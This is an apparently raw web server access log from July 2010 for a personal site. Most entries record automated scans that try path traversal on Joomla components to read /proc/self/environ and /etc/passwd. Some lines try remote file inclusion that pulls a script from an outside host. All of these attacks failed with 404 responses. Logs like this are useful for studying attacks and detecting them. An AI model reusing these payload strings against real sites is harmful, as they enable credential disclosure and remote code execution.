87.229.26.132 - - [09/Jul/2010:01:44:11 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:12 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:12 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
72.55.156.70 - - [09/Jul/2010:01:44:12 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
72.55.156.70 - - [09/Jul/2010:01:44:12 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
72.55.156.70 - - [09/Jul/2010:01:44:12 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
72.55.156.70 - - [09/Jul/2010:01:44:21 -0500] "GET /logs/access_log.1276819200//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.26.132 - - [09/Jul/2010:01:44:25 -0500] "GET /logs/access_log.1276819200//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:57 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:57 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:57 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:57 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:58 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:44:58 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:45:00 -0500] "GET /logs/access_log.1277078400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:45:01 -0500] "GET /logs/access_log.1277078400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
62.44.123.3 - - [09/Jul/2010:01:46:28 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:28 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:28 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:29 -0500] "GET /logs/access_log.1275696000//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:32 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:32 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:32 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:01:46:39 -0500] "GET /logs/access_log.1275696000//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.229.26.132 - - [09/Jul/2010:01:46:41 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:46:41 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:46:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:46:45 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:48:51 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:48:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:48:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:48:55 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:38 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:38 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:38 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:39 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:51 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:49:52 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:51:25 -0500] "GET /logs/access_log.1277078400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:51:25 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:51:25 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:52:07 -0500] "GET /logs/access_log.1276819200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:52:08 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:52:08 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:34 -0500] "GET /logs/access_log.1277510400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:34 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:34 -0500] "GET /logs/access_log.1277510400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:34 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:34 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:53:35 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:07 -0500] "GET /logs/access_log.1276819200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:31 -0500] "GET /logs/access_log.1276646400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:39 -0500] "GET /logs/access_log.1276646400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:47 -0500] "GET /logs/access_log.1277078400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:47 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:54:47 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
93.190.48.203 - - [09/Jul/2010:01:54:53 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:01:54:56 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.229.26.132 - - [09/Jul/2010:01:55:56 -0500] "GET /logs/access_log.1276905600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
93.190.48.203 - - [09/Jul/2010:01:56:21 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.5.163.206 - - [09/Jul/2010:01:56:33 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
94.32.67.251 - - [09/Jul/2010:01:57:27 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
87.229.26.132 - - [09/Jul/2010:01:57:29 -0500] "GET /logs/access_log.1276819200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.250.255.243 - - [09/Jul/2010:01:58:48 -0500] "GET /logs/access_log.1278028800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.229.26.132 - - [09/Jul/2010:02:01:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:01:20 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:01:20 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:01:25 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:01:26 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:01:26 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
93.190.48.203 - - [09/Jul/2010:02:02:31 -0500] "GET /logs/access_log.1275696000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:02:31 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:02:32 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:02:53 -0500] "GET /logs/access_log.1277424000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.229.26.132 - - [09/Jul/2010:02:03:30 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:02:03:30 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
93.190.48.203 - - [09/Jul/2010:02:04:07 -0500] "GET /logs/access_log.1277683200//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:04:08 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:04:09 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:04:22 -0500] "GET /logs/access_log.1276041600//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.5.163.206 - - [09/Jul/2010:02:06:39 -0500] "GET /logs/access_log.1277424000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
195.5.163.206 - - [09/Jul/2010:02:06:39 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
195.5.163.206 - - [09/Jul/2010:02:06:40 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
195.5.163.206 - - [09/Jul/2010:02:06:46 -0500] "GET /logs/access_log.1277683200//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
93.190.48.203 - - [09/Jul/2010:02:10:27 -0500] "GET /logs/access_log.1275696000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:10:27 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:10:27 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
93.190.48.203 - - [09/Jul/2010:02:10:28 -0500] "GET /logs/access_log.1277683200//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.195.233 - - [09/Jul/2010:02:19:04 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.79.246.200 - - [09/Jul/2010:02:20:12 -0500] "GET /logs/bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.79.246.200 - - [09/Jul/2010:02:20:12 -0500] "GET /bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
77.79.246.200 - - [09/Jul/2010:02:20:12 -0500] "GET /logs/access_log.1274572800/bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.250.255.243 - - [09/Jul/2010:02:24:31 -0500] "GET /artwork/banners.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.79.246.200 - - [09/Jul/2010:02:31:09 -0500] "GET /logs/access_log.1274572800/bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.79.246.200 - - [09/Jul/2010:02:31:09 -0500] "GET /logs/bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.79.246.200 - - [09/Jul/2010:02:31:09 -0500] "GET /bbs/download.php?board_skin_path=http://guardi4n.webs.com/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.44.123.3 - - [09/Jul/2010:02:31:14 -0500] "GET /logs/access_log.1277683200//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:02:31:14 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:02:33:51 -0500] "GET /logs/access_log.1275696000//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:02:34:04 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.232 - - [09/Jul/2010:02:37:53 -0500] "GET /logs/access_log.1229731200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:02:39:53 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.254.36.102 - - [09/Jul/2010:02:55:11 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:02:56:49 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.64.231 - - [09/Jul/2010:02:57:26 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.254.36.102 - - [09/Jul/2010:02:58:15 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
217.159.130.74 - - [09/Jul/2010:02:59:29 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.159.130.74 - - [09/Jul/2010:03:00:20 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
174.121.64.231 - - [09/Jul/2010:03:00:48 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [09/Jul/2010:03:01:00 -0500] "GET /logs/access_log.1277251200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.254.36.102 - - [09/Jul/2010:03:01:16 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.171.160.201 - - [09/Jul/2010:03:01:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.ringsworld.com/history/page-2.html""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.171.160.201 - - [09/Jul/2010:03:01:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
174.121.64.231 - - [09/Jul/2010:03:01:53 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.254.36.102 - - [09/Jul/2010:03:02:12 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:03:02:12 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:03:02:12 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:03:02:13 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.171.160.201 - - [09/Jul/2010:03:02:17 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.171.160.201 - - [09/Jul/2010:03:02:20 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.171.160.201 - - [09/Jul/2010:03:02:29 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.171.160.201 - - [09/Jul/2010:03:02:33 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.171.160.201 - - [09/Jul/2010:03:02:35 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
67.195.112.232 - - [09/Jul/2010:03:02:42 -0500] "GET /artwork/toys.htm HTTP/1.0" 200 1337 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.171.160.201 - - [09/Jul/2010:03:03:39 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
65.254.36.102 - - [09/Jul/2010:03:03:45 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:03:03:45 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.254.36.102 - - [09/Jul/2010:03:03:45 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
